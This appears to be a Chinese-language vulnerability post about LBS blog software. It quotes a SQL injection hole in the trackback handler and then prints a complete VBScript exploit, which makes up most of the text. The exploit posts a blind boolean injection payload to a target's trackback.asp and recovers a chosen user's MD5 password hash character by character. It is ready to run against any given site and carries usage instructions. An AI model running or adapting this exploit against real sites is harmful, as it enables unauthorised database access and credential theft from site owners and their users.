处理 SSI 文件时出错
LBS最新安全版本下载:http://www.codepub.com/software/LBS-9627.html
source/src_trackback.asp中的注射
| function trackbackSave(){ var tbEntry={"log_id": input["id"], "url": input["url"], "title": input["title"], "excerpt": input["excerpt"], "blog": input["blog_name"] } // These function calls look really horrible tbEntry.log_id=func.checkInt(tbEntry.log_id); tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url))); tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title)))); tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt)))); tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog)))); if(tbEntry.title=="") tbEntry.title=tbEntry.url; // Better Leave the error messages below in English if(!tbEntry.log_id) trackbackResponse(1, "Invalid Article ID"); if(tbEntry.url=="") trackbackResponse(1, "Source URL is Blank"); if(tbEntry.url==false||tbEntry.title==false||tbEntry.excerpt==false||tbEntry.blog==false) trackbackResponse(1, "Content contains blocked words"); var tmpA=connBlog.query("select Count(log_ID) as i FROM blog_Article where log_locked=false AND log_mode<4 AND log_ID="+tbEntry.log_id); if(tmpA[0]["i"]==0) trackbackResponse(1, "Article does not exist or is locked"); tmpA=connBlog.query("select Count(tb_ID) as i FROM blog_Trackback where tb_Title='"+tbEntry.title+"' AND tb_Excerpt='"+tbEntry.excerpt+"'"); if(tmpA[0]["i"]>0) trackbackResponse(1, "Trackback is already saved"); // Saving trackback |
注意
| tbEntry.log_id=func.checkInt(tbEntry.log_id); tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url))); tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title)))); tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt)))); tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog)))); |
log_id被检查为 int 类型了,但是url以及excerpt等等呢?只是wordfilter以及tril以及去掉html的敏感东西而已,对注射是没有影响的,这些东西是从
| var tbEntry={"log_id": input["id"], "url": input["url"], "title": input["title"], "excerpt": input["excerpt"], "blog": input["blog_name"] } |
input里来的哈~~~~,很明显的一个注射嘛!
因为这里注射的特殊性我们要用or,是一个字符类型的注射
这样可以看到效果
标志也很明显就是Trackback is already saved
那么好了 exploit也应该出来了
| '============================================================================ '使用说明: ' 在命令提示符下: ' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 要破解的博客用户密码 '如: ' cscript.exe lbsblog.vbs www.xxxx.com/bbs/boke.asp admin ' by loveshell '============================================================================ On Error Resume Next Dim oArgs Dim olbsXML 'XMLHTTP对象用来打开目标网址 Dim TargetURL '目标网址 Dim userid '博客用户名 Dim TempStr '存放已获取的部分 MD5密码 Dim CharHex '定义16进制字符 Dim charset Set oArgs = WScript.arguments If oArgs.count <> 2 Then Call ShowUsage() Set olbsXML = createObject("Microsoft.XMLHTTP") '补充完整目标网址 TargetURL = oArgs(0) If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/" TargetURL=TargetURL & "trackback.asp" userid=oArgs(1) TempStr="" CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",") WScript.echo "LBS Blog All version Exploit[新的注射漏洞]"&vbcrlf WScript.echo "By 剑心"&vbcrlf WScript.echo "http://www.loveshell.net/ ~_~我真的够无聊的......"&vbcrlf&vbcrlf WScript.echo "+Fuck the site now"&vbcrlf Call main(TargetURL,BlogName) Set oBokeXML = Nothing '----------------------------------------------sub------------------------------------------------------- '============================================ '函数名称:main '函数功能:主程序,注入获得blog 用户密码 '============================================ Sub main(TargetURL,BlogName) Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage For MainOffset = 1 To 40 For SubOffset = 0 To 15 TempLen = 0 postdata = "" postdata = "' or (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"' and '1'='1" OpenURL = TargetURL olbsXML.open "Post",OpenURL, False, "", "" olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded" olbsXML.send "url=http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & escape(postdata) GetPage = BytesToBstr(olbsXML.ResponseBody) '判断访问的页面是否存在 'WScript.echo GetPage If InStr(GetPage,"Trackback is already saved")<>0 Then TempStr=TempStr & CharHex(SubOffset) WScript.Echo "+Crack now:"&TempStr &String(40-MainOffset, "?") Exit For ElseIf InStr(GetPage,"Trackback Disabled")<>0 Then WScript.echo vbcrlf & "Something error,Not vul" & vbcrlf WScript.Quit End If next Next WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil" End sub '============================================ '函数名称:BytesToBstr '函数功能:将XMLHTTP对象中的内容转化为GB2312编码 '============================================ Function BytesToBstr(body) dim objstream set objstream = createObject("ADODB.Stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = "GB2312" BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function '============================ '函数名称:ShowUsage '函数功能:使用方法提示 '============================ Sub ShowUsage() WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心" WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL userid" WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1" WScript.echo "" WScript.Quit End Sub |